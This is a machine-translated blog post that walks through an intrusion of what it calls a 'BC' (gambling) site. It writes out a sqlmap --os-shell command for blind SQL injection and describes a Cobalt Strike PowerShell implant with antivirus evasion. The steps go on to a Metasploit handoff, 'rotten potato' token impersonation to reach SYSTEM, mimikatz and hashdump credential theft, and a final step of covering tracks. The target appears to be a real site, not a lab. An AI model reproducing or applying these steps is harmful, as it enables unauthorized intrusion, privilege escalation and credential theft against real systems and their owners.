当前位置:网站首页>Penetration practice - sqlserver empowerment
Penetration practice - sqlserver empowerment
2022-07-04 03:43:00 【amingMM】
Technical point :
Yundun dodges
cs / msf Go online with
0x00 Manage premise
BC standing Login screen 
sqlmap Run straight sql Blind note
sqlmap -u "http://127.0.0.1/Login/index " --form --batch --os-shell
os-shell
0x01 go online CS
Cobalt Strike
● Create a listener 
Generate a Powershell command Of Trojans
Throw it to the one just now shell Go inside the command line 
● View permissions
Current shell jurisdiction , Only nt service\mssqlserver, Very low authority 
0x02 Raise the right
● Check out the patches
Installed 154 A patch
Patches : Installed 154 A patch .
[01]: KB2959936
[02]: KB3191564
[03]: KB2896496
[04]: KB2919355
[05]: KB2920189
[06]: KB2928120
[07]: KB2931358
[08]: KB2931366
[09]: KB2933826
[10]: KB2938066
[11]: KB2938772
[12]: KB2949621
[13]: KB2954879
[14]: KB2958262
[15]: KB2958263
[16]: KB2961072
[17]: KB2965500
[18]: KB2966407
[19]: KB2967917
[20]: KB2971203
[21]: KB2971850
[22]: KB2973351
[23]: KB2973448
[24]: KB2975061
[25]: KB2976627
[26]: KB2977629
[27]: KB2981580
[28]: KB2987107
[29]: KB2989647
[30]: KB2989930
[31]: KB2998527
[32]: KB3000850
[33]: KB3003057
[34]: KB3004545
[35]: KB3008242
[36]: KB3011780
[37]: KB3012702
[38]: KB3013172
[39]: KB3013410
[40]: KB3013538
[41]: KB3013769
[42]: KB3013791
[43]: KB3013816
[44]: KB3014442
[45]: KB3019978
[46]: KB3021674
[47]: KB3023266
[48]: KB3024751
[49]: KB3024755
[50]: KB3027209
[51]: KB3030947
[52]: KB3031044
[53]: KB3033446
[54]: KB3034348
[55]: KB3035126
[56]: KB3036612
[57]: KB3038002
[58]: KB3042058
[59]: KB3042085
[60]: KB3043812
[61]: KB3044374
[62]: KB3044673
[63]: KB3045634
[64]: KB3045685
[65]: KB3045717
[66]: KB3045719
[67]: KB3045755
[68]: KB3045999
[69]: KB3046017
[70]: KB3046737
[71]: KB3048043
[72]: KB3054169
[73]: KB3054203
[74]: KB3054256
[75]: KB3054464
[76]: KB3055323
[77]: KB3055343
[78]: KB3055642
[79]: KB3059317
[80]: KB3060681
[81]: KB3060793
[82]: KB3061512
[83]: KB3063843
[84]: KB3071756
[85]: KB3077715
[86]: KB3078405
[87]: KB3078676
[88]: KB3080149
[89]: KB3081320
[90]: KB3082089
[91]: KB3084135
[92]: KB3084905
[93]: KB3086255
[94]: KB3087137
[95]: KB3091297
[96]: KB3092601
[97]: KB3092627
[98]: KB3094486
[99]: KB3095701
[100]: KB3099834
[101]: KB3100473
[102]: KB3102429
[103]: KB3102939
[104]: KB3103616
[105]: KB3103696
[106]: KB3103709
[107]: KB3109103
[108]: KB3109976
[109]: KB3110329
[110]: KB3115224
[111]: KB3121261
[112]: KB3123245
[113]: KB3126041
[114]: KB3126434
[115]: KB3126587
[116]: KB3126593
[117]: KB3132080
[118]: KB3133043
[119]: KB3133690
[120]: KB3134179
[121]: KB3134815
[122]: KB3137728
[123]: KB3138602
[124]: KB3139164
[125]: KB3139398
[126]: KB3139914
[127]: KB3140219
[128]: KB3140234
[129]: KB3144850
[130]: KB3145384
[131]: KB3145432
[132]: KB3146604
[133]: KB3146723
[134]: KB3146751
[135]: KB3147071
[136]: KB3149157
[137]: KB3155784
[138]: KB3156059
[139]: KB3159398
[140]: KB3161949
[141]: KB3162343
[142]: KB3172614
[143]: KB3172729
[144]: KB3175024
[145]: KB3178539
[146]: KB3179574
[147]: KB3185319
[148]: KB4033428
[149]: KB4483187
[150]: KB4486105
[151]: KB4486107
[152]: KB5001403
[153]: KB5007154
[154]: KB5008263
network card : Installed 1 individual NIC.
[01]: Red Hat VirtIO Ethernet Adapter
Connection name : Ethernet
Enable DHCP: yes
Use ms16-075 try 
see AV
https://mrxn.net/avlist/
Alibaba cloud shield
0x03 Transition msf
● newly build payload
choice Foreign HTTP
stay msf Upper use
● CS New session
Select your session to derive the session
stay msf Wait until the session is connected ( Be careful : It seems that the session cannot be derived from the domain prefix )
Permission is still very low , stay CS It uses file browsing to upload rotten potatoes
● In the current session , Right to start :
cd C:\\Users\\Public
use incognito
execute -cH -f ./potato.exe
list_tokens -u
Copy administrator The token
impersonate_token "administrator The token "
Got it system jurisdiction
0x04 Grab Hash
load mimikatz
creds_all
Use msf Self contained :run post/windows/gather/smart_hashdump
Direct login
0x05 Clean up traces
边栏推荐
- Teach you how to optimize SQL
- Infiltration practice guest account mimikatz sunflower SQL rights lifting offline decryption
- Explain AI accelerator in detail: why is this the golden age of AI accelerator?
- GUI Graphical user interface programming (XIV) optionmenu - what do you want your girlfriend to wear on Valentine's day
- Stm32bug [the project references devices, files or libraries that are not installed appear in keilmdk]
- [.NET + mqtt]. Mise en œuvre de la communication mqtt dans l'environnement net 6 et démonstration de code pour l'abonnement et la publication de messages bilatéraux du serveur et du client
- Stm32bug [stlink forced update prompt appears in keilmdk, but it cannot be updated]
- Es network layer
- 三菱M70宏变量读取三菱M80公共变量采集三菱CNC变量读取采集三菱CNC远程刀补三菱机床在线刀补三菱数控在线测量
- logistic regression
猜你喜欢
Mindmanager2022 efficient and easy to use office mind map MindManager
基于PHP的轻量企业销售管理系统
Objective-C description method and type method
No clue about the data analysis report? After reading this introduction of smartbi, you will understand!
Webhook triggers Jenkins for sonar detection
Wechat official account web page authorization
MySQL query
![[paddleseg source code reading] paddleseg custom data class](/img/88/37c535b371486db545abc392a685af.png)
[paddleseg source code reading] paddleseg custom data class
PID of sunflower classic
Nbear introduction and use diagram
随机推荐
Aperçu du code source futur - série juc
Wechat official account web page authorization
ctf-pikachu-CSRF
2022 Guangxi provincial safety officer a certificate examination materials and Guangxi provincial safety officer a certificate simulation test questions
Is it really so difficult to learn redis? Today, a fan will share his personal learning materials!
JDBC 进阶
System integration meets the three business needs of enterprises
what does ctrl + d do?
How to pipe several commands in Go?
(practice C language every day) pointer sorting problem
Deep thinking on investment
Cache general management class + cache httpcontext Current. Cache and httpruntime Differences between caches
[untitled]
MySQL data query optimization -- data structure of index
毕业总结
MySQL backup notes
Constantly changing harmonyos custom JS components during the Spring Festival - Smart Koi
Which product is better for 2022 annual gold insurance?
How to use STR function of C language
JSON string conversion in unity